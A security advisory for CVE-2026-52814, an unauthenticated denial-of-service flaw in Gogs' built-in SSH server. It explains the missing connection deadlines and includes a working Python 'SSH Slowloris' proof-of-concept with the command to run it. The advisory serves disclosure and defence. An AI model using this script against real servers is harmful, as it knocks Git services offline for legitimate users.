PT-2026-51632 · Go · Gogs.Io/Gogs
Published
2026-06-23
·
Updated
2026-06-23
·
CVE-2026-52814
CVSS v4.0
5.5
Medium
| Vector | AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P |
The Gogs built-in Go SSH server is vulnerable to an unauthenticated, asymmetric Denial of Service (DoS) attack. The application accepts inbound TCP connections and passes them to
golang.org/x/crypto/ssh.NewServerConn inside a new goroutine without enforcing any read/write deadlines on the underlying net.Conn.An unauthenticated attacker can open multiple TCP connections to the SSH port and simply withhold the SSH protocol banner. This forces the server to spawn an unbounded number of goroutines that block indefinitely waiting for socket I/O. This leads to complete File Descriptor (FD) exhaustion, preventing legitimate users from accessing the Git SSH service, and ultimately destabilizing the entire Gogs process (e.g., causing internal log rotation failures).
Vulnerability Details
In
internal/ssh/ssh.go, the listen function contains an accept loop that spawns a goroutine for every incoming connection:go
for {
conn, err := listener.Accept()
// ...
go func() {
// VULNERABILITY: No conn.SetDeadline() is called here
sConn, chans, reqs, err := ssh.NewServerConn(conn, config)
// ...
}()
}
The
golang.org/x/crypto/ssh package is transport-agnostic and explicitly relies on the caller to manage connection timeouts before initiating the cryptographic handshake. Because Gogs never calls conn.SetDeadline(), the call to NewServerConn eventually reaches io.ReadFull (inside readVersion()) and blocks forever on the kernel TCP socket waiting for the client to send the SSH-2.0-... banner.Each stuck connection consumes a file descriptor and ~10KB of memory (Goroutine stack + connection structs). An attacker holding thousands of these connections open with zero bandwidth (no data sent) will quickly exhaust the OS
ulimit -n limits (accept4: too many open files), completely neutralizing the service.Steps to Reproduce
1. Environment Setup:
Ensure Gogs is configured to use the built-in Go SSH server in
app.ini:ini
[server]
START SSH SERVER = true
SSH PORT = 2222
SSH LISTEN PORT = 2222
2. The Exploit (PoC):
Save the following Python script as
slowloris-ssh.py. This script connects to the SSH port and intentionally stalls the handshake.python
#!/usr/bin/env python3
import socket, sys, time
target host = sys.argv[1]
target port = int(sys.argv[2])
n = int(sys.argv[3])
sockets = []
print(f"[*] Starting SSH Slowloris on {target host}:{target port}...")
for i in range(n):
try:
s = socket.socket(socket.AF INET, socket.SOCK STREAM)
s.settimeout(5)
s.connect((target host, target port))
# VULNERABILITY EXPLOIT: Do NOT send the "SSH-2.0-..." banner.
sockets.append(s)
if i % 100 == 0:
print(f"[+] {i} stuck connections established")
except Exception as e:
print(f"[-] Stopped at {i} connections. Reason: {e}")
break
print(f"[+] Holding {len(sockets)} connections to starve the server...")
while True:
time.sleep(60)
3. Execution:
Run the script against the target, ensuring the number of connections (
n) exceeds the server's configured file descriptor limit (e.g., 1500 for default 1024 ulimit environments):
python3 slowloris-ssh.py <target-ip> 2222 15004. Observe the Impact:
- Attempt to connect legitimately:
nc -v <target-ip> 2222. The connection will hang or be refused immediately. - Inspect the Gogs server logs/console. You will observe catastrophic I/O failures such as:
[clog] [file]: rename rotated file ...: no such file or directoryaccept4: too many open files
Impact
- Denial of Service: Legitimate developers cannot push, pull, or clone repositories via SSH.
POC:-
Fix
Resource Exhaustion
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Gogs.Io/Gogs